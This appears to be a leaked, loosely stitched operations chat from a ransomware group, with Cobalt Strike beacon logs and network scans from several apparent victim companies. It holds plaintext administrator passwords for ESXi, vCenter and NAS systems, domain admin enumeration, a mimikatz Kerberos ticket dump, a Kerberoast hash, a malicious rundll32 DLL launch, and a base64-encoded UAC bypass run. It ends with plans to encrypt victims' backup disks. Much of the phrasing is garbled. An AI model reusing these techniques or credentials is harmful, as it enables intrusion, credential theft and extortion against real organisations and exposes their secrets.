On these servers, you have to check the vim console to see if there is a link to the cloud ``` SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS sky-beuza-01.skytech1.local `````` https://10.0.2.32/ui/#/login ESXi' root\$uperm@n `````` Website: https://sky-vcenter65.skytech1.local Username: 'administrator@vsphere.local' Password: 'Superm@n2018' `````` 10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES 10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas 10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas 10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas ``If I understood correctly some kind of admin from what `` http://10.0.6.243/web/guest/en/websys/webArch/mainFrame.cgi `````` https://10.0.6.98/login.html PowerEdge T620 http://10.0.6.153/ myshara http://10.0.6.83/rtknas4.40/ nas http://10.0.6.54 is requesting your username and password. The site says: "ReadyNAS Admin". 
`````` https://10.0.2.32/ui/#/login ESXi' https://10.0.2.34/ui/#/login https://10.0.2.36/ui/#/login https://10.0.2.38/ui/#/login https://10.0.6.24/ui/ `````` 10.0.6.243:80 10.0.6.155:80 10.0.6.153:443 10.0.6.153:80 10.0.6.130:8080 10.0.6.130:443 10.0.6.130:80 10.0.6.124:8080 10.0.6.124:80 10.0.6.117:8080 10.0.6.117:443 10.0.6.117:80 10.0.6.98:443 10.0.6.98:80 10.0.6.96:8080 10.0.6.96:443 10.0.6.96:80 10.0.6.95:443 10.0.6.95:80 10.0.6.86:8080 10.0.6.86:443 10.0.6.86:80 10.0.6.83:443 10.0.6.83:80 10.0.6.73:8080 10.0.6.73:443 10.0.6.73:80 10.0.6.62:443 10.0.6.62:80 10.0.6.58:8080 10.0.6.58:443 10.0.6.58:80 10.0.6.54:443 10.0.6.54:80 10.0.6.109:22 (SSH-2.0-dropbear) 10.0.6.98:22 (SSH-2.0-OpenSSH_7.4) 10.0.6.79:22 (SSH-2.0-dropbear) 10.0.6.155:8080 10.0.6.155:443 10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) nas 10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas 10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas 10.0.2.39:443 10.0.2.39:80 10.0.2.38:443 10.0.2.38:80 10.0.2.36:443 10.0.2.36:80 10.0.2.35:443 10.0.2.35:80 10.0.2.34:443 10.0.2.34:80 10.0.2.32:443 10.0.2.32:80 10.0.2.31:443 10.0.2.31:80 10.0.2.28:443 10.0.2.28:80 10.0.2.25:443 10.0.2.25:80 10.0.2.21:80 10.0.2.20:80 10.0.2.17:80 10.0.2.15:443 10.0.2.15:80 10.0.2.11:443 10.0.2.11:80 10.0.2.10:443 10.0.2.10:80 10.0.2.8:80 10.0.2.7:80 10.0.2.1:80 10.0.1.179:80 10.0.1.101:80 10.0.2.39:22 (SSH-2.0-OpenSSH_7.4) 10.0.2.38:22 (SSH-2.0-OpenSSH_7.5) 10.0.2.36:22 (SSH-2.0-OpenSSH_7.5) 10.0.2.35:22 (SSH-2.0-OpenSSH_7.4) 10.0.2.34:22 (SSH-2.0-OpenSSH_7.5) 10.0.2.32:22 (SSH-2.0-OpenSSH_7.5) 10.0.2.31:22 (SSH-2.0-OpenSSH_7.4) 10.0.2.17:22 (SSH-2.0-OpenSSH_5.9p1-hpn13v11) 10.0.2.15:22 (SSH-2.0-OpenSSH_7.1) 10.0.2.5:22 (SSH-2.0-dropbear) 10.0.2.4:22 (SSH-2.0-dropbear) 10.0.2.2:22 (SSH-2.0-dropbear) 10.0.1.181:22 (SSH-2.0-dropbear) 10.0.2.3:22 (SSH-2.0-dropbear) ``I got it, can you help dumbo come back before 1 o'clock@tl1 help others? 
the machine seems to be off all the sessions are off,the last 10-15 minutes of doing nothing with the session is ok,keep working i ran it without and it worked i'm not sure i need it,no it didn't delete? what do i wait for? how do you know it worked? shell rundll32 C:\Users\color764\AppData\Local\Packages\AD2F1837.HPPrinterControl_v10z8vjag6ke6\LocalState\HPPrinterControl_v10.dll, ehnpruPontv #generald how to run and what does it do? ``` beacon> shell net localgroup "Administrators" [*] Tasked beacon to run: net localgroup "Administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator ORANGE_FACT\Desk_Top_Admin ORANGE_FACT\Domain Admins ORANGE_FACT\POSAdmin The command completed successfully. beacon> shell net group "Domain admins" /dom [*] Tasked beacon to run: net group "Domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain vpinc.net. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator avamarbackupuser hpsim itinfo jf jimfu jmb jonb kendallr kr MDJ meraki1 mikedj MSOL_c4e9c8b90962 prtg prtgnew rd scotttaylor siem_agent SQLADMIN SQLSYSTEM Svc_ADSync zscaler The command completed successfully. beacon> shell net group "Enterprise Admins" /dom [*] Tasked beacon to run: net group "Enterprise Admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain vpinc.net. 
Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator jb jf jmb kr MDJ mikedj rd scotttaylor Svc_ADSync The command completed successfully. `````` [*] 192.168.168.5:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 192.168.168.5:445 - Host could not be identified: Unix (Samba 3.0.33-3.41.el5_11) [*] 192.168.168.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:optional) (uptime:21w 0d 1h 37m 25s) (guid:{ff73b7ae-f1ba-46e5-8e8b-3c9fb9444156}) (authentication domain:PKGPROD) [+] 192.168.168.15:445 - Host is running Windows 2012 Standard (build:9200) (name:TIMECLOCKSQL) (domain:PKGPROD) [*] 192.168.168.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:required) (uptime:6d 8h 40m 17s) (guid:{c40e3c81-0bce-4afc-ba0d-e18c58581a0c}) (authentication domain:PKGPROD) [+] 192.168.168.10:445 - Host is running Windows 2012 Standard (build:9200) (name:2K12SERVER) (domain:PKGPROD) [*] 192.168.168.1-80: - Scanned 23 of 80 hosts (28% complete) [*] 192.168.168.1-80: - Scanned 31 of 80 hosts (38% complete) [*] 192.168.168.1-80: - Scanned 45 of 80 hosts (56% complete) [*] 192.168.168.1-80: - Scanned 46 of 80 hosts (57% complete) [*] 192.168.168.1-80: - Scanned 50 of 80 hosts (62% complete) [*] 192.168.168.1-80: - Scanned 50 of 80 hosts (62% complete) [*] 192.168.168.54:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 27m 49s) (guid:{56e90780-c2ba-45ef-877d-d2f418746196}) (authentication domain:PKGPROD) [+] 192.168.168.54:445 - Host is running Windows 8.1 Pro (build:9600) (name:FRONTDESK) (domain:PKGPROD) [*] 192.168.168.53:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) 
(guid:{d0b01a41-07d7-4ad5-a0b6-90c069a5bd26}) (authentication domain:PKGPROD) [*] 192.168.168.70:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:3d 8h 25m 12s) (guid:{cb8fffad-f637-4c85-b211-e32b405df3ac}) (authentication domain:PKGPROD) [+] 192.168.168.70:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-101) (domain:PKGPROD) [*] 192.168.168.63:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 28m 22s) (guid:{ac014121-b0c2-442a-93b8-d2c98f8c66e2}) (authentication domain:PKGPROD) [+] 192.168.168.63:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-102) (domain:PKGPROD) [*] 192.168.168.1-80: - Scanned 56 of 80 hosts (70% complete) [*] 192.168.168.73:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{ce91e8ea-649b-4aa0-b6e3-81718f694399}) (authentication domain:PKGPROD) [*] 192.168.168.66:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{62b17fea-9ad5-4532-92cf-8276e5e90b86}) (authentication domain:PKGPROD) [*] 192.168.168.1-80: - Scanned 71 of 80 hosts (88% complete) [*] 192.168.168.1-80: - Scanned 80 of 80 hosts (100% complete) [*] Auxiliary module execution completed ``https://kali.tools/?p=5342 what for thin clients?'' script runs `` ACUCOBOL-GT Web Thin Client ```` ' Location of file with usernames and human-readable terminal numbers SouthWareUsersFile = "swusers\swusers.txt" ``what's up? 
beacon> mimikatz kerberos::list [*] Tasked beacon to run mimikatz's kerberos::list command [+] host called home, sent: 706120 bytes [+] received output: [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL Client Name : jess @ PKGPROD.LOCAL Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; forwardable ; [00000001] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 9/17/2020 8:27:44 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL Client Name : jess @ PKGPROD.LOCAL Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; [00000002] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 9/18/2020 4:48:38 AM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM Server Name : RPCSS/2K12SERVER.pkgprod.local @ PKGPROD.LOCAL Client Name : jess @ PKGPROD.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ; [00000003] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM Server Name : ldap/2k12server.pkgprod.local @ PKGPROD.LOCAL Client Name : jess @ PKGPROD.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ; [00000004] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM Server Name : cifs/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL Client Name : jess @ PKGPROD.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ; [00000005] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 9/17/2020 9:06:32 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM Server Name : LDAP/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL Client Name : jess @ PKGPROD.LOCAL Flags 40a50000 : name_canonicalize ; 
ok_as_delegate ; pre_authenticate ; renewable ; forwardable ; `````` (ARP) Target '192.168.168.10' is alive. (ARP) Target '192.168.168.15' is alive. 00-15-5D-A8-0A-039C (ARP) Target '192.168.168.5' is alive. -(ARP) Target '192.168.168.1' is alive. 008E2C---1599B8---5D5BED---A88823---0A6A3A- -0100 [+] received output: (ARP) Target '192.168.168.54' is alive. (ARP) Target '192.168.168.53' is alive. 64F4--5139--0609--551A--08EA--50A7 (ARP) Target '192.168.168.63' is alive. A0-48-1C-99-8D-D8 (ARP) Target '192.168.168.50' is alive. 98-8B-0A-C2-59-08 (ARP) Target '192.168.168.66' is alive. (ARP) Target '192.168.168.70' is alive. F4A0--3948--091C--0F99--9B8E--A8AD (ARP) Target '192.168.168.73' is alive. 9C-7B-EF-AD-76-64 [+] received output: (ARP) Target '192.168.168.88' is alive. 00-11-0A-F7-EA-A8 [+] received output: (ARP) Target '192.168.168.231' is alive. 00-AF-1F-6F-A2-E1 [+] received output: 192.168.168.73:3389 [+] received output: 192.168.168.73:139 192.168.168.73:135 [+] received output: 192.168.168.70:3389 [+] received output: 192.168.168.70:664 [+] received output: 192.168.168.70:623 [+] received output: 192.168.168.70:139 192.168.168.70:135 [+] received output: 192.168.168.66:3389 [+] received output: 192.168.168.66:139 192.168.168.66:135 [+] received output: 192.168.168.63:3389 [+] received output: 192.168.168.63:664 [+] received output: 192.168.168.63:623 [+] received output: 192.168.168.63:139 192.168.168.63:135 [+] received output: 192.168.168.54:664 [+] received output: 192.168.168.54:139 192.168.168.54:135 [+] received output: 192.168.168.53:3389 [+] received output: 192.168.168.53:139 192.168.168.53:135 [+] received output: 192.168.168.50:554 [+] received output: 192.168.168.50:80 [+] received output: 192.168.168.15:5985 192.168.168.15:5949 192.168.168.15:5948 [+] received output: 192.168.168.15:5504 [+] received output: 192.168.168.15:3389 [+] received output: 192.168.168.15:443 [+] received output: 192.168.168.15:139 192.168.168.15:135 192.168.168.15:80 
192.168.168.10:5985 192.168.168.10:5949 192.168.168.10:5948 [+] received output: 192.168.168.10:3389 [+] received output: 192.168.168.10:636 [+] received output: 192.168.168.10:593 [+] received output: 192.168.168.10:464 [+] received output: 192.168.168.10:389 192.168.168.10:139 192.168.168.10:135 [+] received output: 192.168.168.10:88 192.168.168.10:53 192.168.168.5:5632 [+] received output: 192.168.168.5:631 192.168.168.5:609 [+] received output: 192.168.168.5:139 192.168.168.5:111 192.168.168.5:22 (SSH-2.0-OpenSSH_4.3) [+] received output: 192.168.168.1:443 [+] received output: 192.168.168.1:80 192.168.168.1:22 (SSH-2.0-OpenSSH_7.2) 192.168.168.5:445 (platform: 500 version: 4.9 name: PKGPROD domain: MYGROUP) 192.168.168.10:445 (platform: 500 version: 6.2 name: 2K12SERVER domain: PKGPROD) 192.168.168.15:445 (platform: 500 version: 6.2 name: TIMECLOCKSQL domain: PKGPROD) 192.168.168.53:445 (platform: 500 version: 10.0 name: SALES2-HP-2019 domain: PKGPROD) 192.168.168.54:445 (platform: 500 version: 6.3 name: FRONTDESK domain: PKGPROD) 192.168.168.63:445 (platform: 500 version: 6.3 name: PKG-102 domain: PKGPROD) 192.168.168.66:445 (platform: 500 version: 10.0 name: BARBARA-HP-2019 domain: PKGPROD) 192.168.168.70:445 (platform: 500 version: 6.3 name: PKG-101 domain: PKGPROD) 192.168.168.73:445 (platform: 500 version: 10.0 name: SALES1-HP-2019 domain: PKGPROD) Scanner module is complete ``````
Windows IP Configuration Host Name . . . . . : Sales1-HP-2019 Primary Dns Suffix . . . . : pkgprod.local Node Type . . . . . : Hybrid IP Routing Enabled . . . . : No WINS Proxy Enabled . . . . : No DNS Suffix Search List . . . . : pkgprod.local Ethernet adapter Ethernet: Connection-specific DNS Suffix . . : pkgprod.local Description . . . . . : Realtek PCIe GbE Family Controller Physical Address . . . . . : 9C-7B-EF-AD-76-64 DHCP Enabled . . . . . : Yes Autoconfiguration Enabled . . : Yes Link-local IPv6 Address . . . . : fe80::994:371f:ea5d:17bb%7(Preferred) IPv4 Address . . . . : 192.168.168.73(Preferred) Subnet Mask . . . . : 255.255.255.0 Lease Obtained . . . . : Monday, September 14, 2020 6:18:32 PM Lease Expires . . . . . : Tuesday, September 22, 2020 6:18:28 PM Default Gateway . . . . : 192.168.168.1 DHCP Server . . . . : 192.168.168.10 DHCPv6 IAID . . . . : 110918639 DHCPv6 Client DUID . . . . : 00-01-00-01-24-C4-86-07-9C-7B-EF-AD-76-64 DNS Servers . . . . : 192.168.168.10 Primary WINS Server . . . . : 192.168.168.10 NetBIOS over Tcpip . . . . : Enabled ``Not sure there's going to be a session again kidalidll kinli? here``` 10.1.4.250:80 --alibi 10.1.4.211:443 -- it did not open 10.1.4.211:80 10.1.4.151:80 -- did not open 10.0.0.104:22 (SSH-2.0-dropbear_2018.76) 10.0.0.104:443 10.0.0.104:80 -- 503 Service Not Available 10.0.0.210:80 -- Web Service tab, did not open `````` 10.0.0.5:445 (platform: 500 version: 10.0 name: SCCY-DC domain: SCCY) 10.0.0.17:445 (platform: 500 version: 10.0 name: SCCY-14 domain: SCCY) 10.0.0.24:445 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER) 10.0.0.26:445 (platform: 500 version: 10.0 name: SCCY-LT07 domain: SCCY) 10.0.0.38:445 10.0.0.40:445 (platform: 500 version: 10.0 name: SCCY-04 domain: SCCY) 10.0.0.41:445 (platform: 500 version: 10.0 name: SCCY-10 domain: SCCY) 10.0.0.45:445 10.0.0.51:445 (platform: 500 version: 6.1 name: SCCY-DATTO domain: WORKGROUP) 10.0.0.57:445 (platform: 500 version: 10.0 name: SCCY-03 domain: SCCY) 10.0.0.59:445 (platform: 500 version: 10.0 name: SCCY-05 domain: SCCY) 10.0.0.62:445 (platform: 500 version: 10.0 name: SCCY-19 domain: SCCY) 10.0.0.63:445 10.0.0.67:445 (platform: 500 version: 10.0 name: SCCY-LT04 domain: SCCY) 10.0.0.71:445 (platform: 500 version: 10.0 name: SCCY-LT05 domain: SCCY) 10.0.0.75:445 (platform: 500 version: 10.0 name: SCCY-LT3 domain: SCCY) 10.0.0.76:445 (platform: 500 version: 10.0 name: SCCY-01 domain: SCCY) 10.0.0.82:445 (platform: 500 version: 10.0 name: CONNIE-MICRO domain: 
SCCY) 10.0.0.83:445 10.0.0.84:445 (platform: 500 version: 10.0 name: SCCY-02 domain: SCCY) 10.0.0.89:445 (platform: 500 version: 10.0 name: JOE-AIO2 domain: SCCY) 10.0.0.91:445 (platform: 500 version: 10.0 name: SCCY-RECEIVING domain: SCCY) 10.0.0.93:445 (platform: 500 version: 6.1 name: QVPRO-PC domain: SCCY) 10.0.0.102:445 (platform: 500 version: 10.0 name: SCCY-16 domain: SCCY) 10.0.0.103:445 (platform: 500 version: 10.0 name: JOE-BOXX-W10 domain: SCCY) 10.0.0.110:445 (platform: 500 version: 10.0 name: MFGWIN10-1 domain: SCCY) 10.0.0.111:445 (platform: 500 version: 10.0 name: SCCY-12 domain: SCCY) 10.0.0.113:445 (platform: 500 version: 10.0 name: QATRACKING domain: SCCY) 10.0.0.116:445 (platform: 500 version: 10.0 name: SCCY-18 domain: SCCY) 10.0.0.118:445 (platform: 500 version: 10.0 name: SCCY-15 domain: SCCY) 10.0.0.119:445 (platform: 500 version: 10.0 name: SCCY-09 domain: SCCY) 10.0.0.123:445 (platform: 500 version: 10.0 name: SCCY-11 domain: SCCY) 10.0.0.128:445 (platform: 500 version: 10.0 name: SCCY-08 domain: SCCY) 10.0.0.146:445 (platform: 500 version: 10.0 name: SCCY-06 domain: SCCY) 10.0.0.147:445 (platform: 500 version: 10.0 name: SCCY-21 domain: SCCY) 10.0.0.148:445 (platform: 500 version: 10.0 name: SCCY-13 domain: SCCY) 10.0.0.252:445 (platform: 500 version: 10.0 name: TS domain: SCCY) 10.0.30.117:445 10.0.30.118:445 10.0.30.123:445 10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY) 10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY) Scanner module is complete `````` 10.0.0.104:22 (SSH-2.0-dropbear_2018.76) 10.0.0.104:443 10.0.0.104:80 --br 10.0.0.122:443 10.0.0.122:80 10.0.0.132:22 (SSH-2.0-OpenSSH_7.8) --- BR 10.0.0.132:443 10.0.0.132:80 10.0.0.134:22 (SSH-2.0-OpenSSH_7.8) ---BR 10.0.0.134:443 10.0.0.134:80 10.0.0.151:22 (SSH-2.0-OpenSSH_6.6) --BR 10.0.0.151:443 10.0.0.151:80 10.0.0.152:80 10.0.0.153:80 10.0.0.15:443 10.0.0.154:80 10.0.0.16:443 PRINTER 10.0.0.16:80 10.0.0.199:443 BROWSER!!!!! 
VPN 10.0.0.199:80 10.0.0.200:443 BROWSER!!! CANON 10.0.0.200:80 10.0.0.201:443 BROWSER!!! CANON 10.0.0.201:80 10.0.0.202:80 HZ BROWSER!!! ALIBI AV? 10.0.0.203:443 CANON 10.0.0.203:80 10.0.0.204:443 CANON 10.0.0.204:80 10.0.0.205:443 CANON 10.0.0.205:80 10.0.0.206:443 CANON 10.0.0.206:80 10.0.0.210:80 ????? 10.0.0.215:80 ZEBRA 10.0.0.21:80 NETGEAR router 10.0.0.230:22 (SSH-2.0-mpSSH_0.2.1) HP iLO SQLSRVR VHOST 10.0.0.230:80 10.0.0.235:80 10.0.0.236:80 10.0.0.237:80 10.0.0.24:80 IIS 10.0.0.252:443 RD Web Access 10.0.0.252:80 10.0.0.29:22 (SSH-2.0-dropbear_2018.76) HZ ???? 10.0.0.29:443 10.0.0.29:80 10.0.0.30:22 (SSH-2.0-dropbear_2013.59) 10.0.0.34:443 10.0.0.34:80 10.0.0.39:22 (SSH-2.0-OpenSSH_6.1) 10.0.0.42:22 (SSH-2.0-OpenSSH_6.1) 10.0.0.43:80 ALLWORKS 10.0.0.4:443 NAS Synology !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1 10.0.0.4:80 10.0.0.46:22 (SSH-2.0-dropbear_2018.76) HZ ???? 10.0.0.46:443 10.0.0.46:80 10.0.0.49:22 (SSH-2.0-OpenSSH_6.1) 10.0.0.50:443 CANON 10.0.0.50:80 10.0.0.51:443 NAS ?!?!? 10.0.0.51:80 10.0.0.52:22 (SSH-2.0-dropbear_2018.76) HZ ????? 10.0.0.52:443 10.0.0.52:80 10.0.0.55:443 10.0.0.55:80 10.0.0.67:80 10.0.0.6:80 10.0.0.90:443 10.0.0.90:80 10.0.0.99:80 10.0.30.100:22 (SSH-2.0-dropbear_2018.76) HZ ????? 10.0.30.100:443 10.0.30.100:80 10.0.30.101:22 (SSH-2.0-dropbear_2018.76) HZ ????? 10.0.30.101:443 10.0.30.101:80 10.0.30.119:443 10.0.30.119:80 10.0.30.126:80 10.0.30.127:22 (SSH-2.0-dropbear_2018.76) HZ ??? 10.0.30.127:443 10.0.30.127:80 10.0.30.128:80 10.0.30.129:80 10.0.30.130:80 10.0.30.131:80 10.0.30.132:80 10.0.30.133:80 10.0.30.30:22 (SSH-2.0-OpenSSH_6.1) 10.0.30.4:443 SWITCH 10.0.30.4:80 10.0.30.5:443 10.0.30.5:80 10.0.40.2:443 10.0.40.2:80 `````` 10.1.4.250:80 -br 10.1.4.211:443 -br 10.1.4.211:80 10.1.4.175:443 -NAS 10.1.4.175:80 10.1.4.175:22 (SSH-2.0-OpenSSH_7.4) 10.1.4.175:445 10.1.4.162:80 - phone? 
10.1.4.153:80 -phone 10.1.4.152:80 -phone 10.1.4.151:80 -br 10.1.4.80:80 -phone 10.1.4.254:22 (SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2) 10.1.4.154:22 (SSH-2.0-dropbear_2016.74) 10.1.4.168:22 (SSH-2.0-OpenSSH_6.1) 10.1.4.99:445 10.1.4.205:445 10.1.4.210:445 10.1.4.221:445 10.1.4.230:445 `````` 10.0.30.147:3389 10.0.30.143:3389 10.0.30.133:80 10.0.30.132:80 10.0.30.131:80 10.0.30.130:80 10.0.30.129:80 10.0.30.128:80 10.0.30.127:443 10.0.30.127:80 10.0.30.126:80 10.0.30.127:22 (SSH-2.0-dropbear_2018.76) 10.0.30.119:8080 10.0.30.119:443 10.0.30.119:80 10.0.30.101:443 10.0.30.101:80 10.0.30.100:443 10.0.30.100:80 10.0.30.1:8080 10.0.30.100:22 (SSH-2.0-dropbear_2018.76) 10.0.30.101:22 (SSH-2.0-dropbear_2018.76) 10.0.30.30:22 (SSH-2.0-OpenSSH_6.1) 10.0.30.117:445 10.0.30.123:445 10.0.30.143:445 (platform: 500 version: 10.0 name: SCCY-07 domain: SCCY) 10.0.30.147:445 (platform: 500 version: 10.0 name: SCCY-TN01 domain: SCCY)
8 are not pinged; 12 of them are DCs and the rest have some sort of Exchange role, taken from ad_comp
```
Jdodc50.jdossn.local
Jdodc51.jdossn.local
JDOdc65.jdossn.local
JDODC12.jdossn.local
JDODC64.jdossn.local
JDODC61.jdossn.local
JDODC63.jdossn.local
JDODC66.jdossn.local
JDODC62.jdossn.local
JDOEXVS01.jdossn.local
JDOEXVS03.jdossn.local
JDOEXHYBRID02.jdossn.local
JDOEXCH03.jdossn.local
JDOEXHYBRID01.jdossn.local
jdoexhybrid03.jdossn.local
JDOEXVS02.jdossn.local
JDOINFADMIN01.jdossn.local
JDODC67.jdossn.local
JDODC68.jdossn.local
JDODC69.jdossn.local
```
```
User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:24:41> shell ping JDOEXVS01 -n 1
[*] Tasked beacon to run: ping JDOEXVS01 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS01. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:25:28> shell ping JDOEXVS03 -n 1
[*] Tasked beacon to run: ping JDOEXVS03 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS03. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:26:02> shell ping JDOEXHYBRID02 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID02 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Pinging JDOEXHYBRID02.jdossn.local [172.31.190.92] with 32 bytes of data:
Request timed out.
Ping statistics for 172.31.190.92:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:26:51> shell ping JDOEXCH03 -n 1
[*] Tasked beacon to run: ping JDOEXCH03 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXCH03. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:27:18> shell ping JDOEXHYBRID01 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID01 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Ping request could not find host JDOEXHYBRID01. Please check the name and try again.

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:27:49> shell ping JDOEXHYBRID03 -n 1
[*] Tasked beacon to run: ping JDOEXHYBRID03 -n 1
[+] host called home, sent: 54 bytes
[+] received output:
Pinging JDOEXHYBRID03.jdossn.local [172.31.190.93] with 32 bytes of data:
Request timed out.
Ping statistics for 172.31.190.93:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

User 7[W08872611194]nddeviowlbo/3856|2020Oct24 03:28:24> shell ping JDOEXVS02 -n 1
[*] Tasked beacon to run: ping JDOEXVS02 -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Ping request could not find host JDOEXVS02. Please check the name and try again.
```
This is the first time I have heard of lumisco.com, matches, gpjdahocorpin? You now have 3 networks in operation; before you leave, report on each: what was done in the current task, what difficulties, what vectors and so on. Started up, yes?
oh how well in the test lab on Windows 10 version 1909 with defender on SharpFodhelperBypass works (https://github.com/FatRodzianko/SharpFodhelperBypass) sample run - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA== command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint)[ ](https://mediaeveryone.com/channel/general?msg=hhBzAGf6Z9ZQ27wgX) This thing works in a test lab on win 10 It opens cmd under admin, but you can't give it arguments, i.e. tell it to run our exe or specify a command. what can be done with it then? https://github.com/hfiref0x/UACMEhttps://github.com/L3cr0f/DccwBypassUACэто till lunchtime the problem is above + you need to look for methods of bypassing UAC, or fresh spoolsv[ ](https://mediaeveryone.com/channel/general?msg=yjAALDWw963Zv3b8j) On the forum lies, gave the link above Finish it is not realistic, I think it's infinite:space_invader:mindmap finished? LEADMIN Deere0419! ``have a clear''. $krb5tgs$23$aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.mapciasp.com:1433$7fbb03b44cb498cea3660dc0f17f4326$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#2013 ``Listings separately and add where there are no filesnet you have not uploaded the listings to the mags? probably roll out the other day we are trying to think of a fileless solution that would work at least through the sessionprivet, alas, I do not know it's almost unrealistic given that you need contextWell, or at least history, even if without passwordsHi, do you know if there is something that works on the principle of SessionGopher only for browser Credits? 1.done.overland.com until tomorrow goodnightbz tomorrow by 6noon then we all are ok? bitches) there is one full disk encrypted - file dump and 60% c backups + filesfflagged us and part of the servers(what is the movement at least 40 minjm us encrypted? 
overland servers per AD: 76, alive: 36, closed: 36; hosts per AD: 327, alive: 82, closed: 82; ovrweb servers per AD: 10, alive: 5, shut down: 5; ovrcomm servers per AD: 6, alive: 3, closed: 3
```
exe started.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 229999 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
```
If possible, it's better to encrypt two disks with backups: 1, with servers, we'll use it, there is one 2 TB file; 2, with the extended backups of whines and so on, we'll pull it in and encrypt it.
```
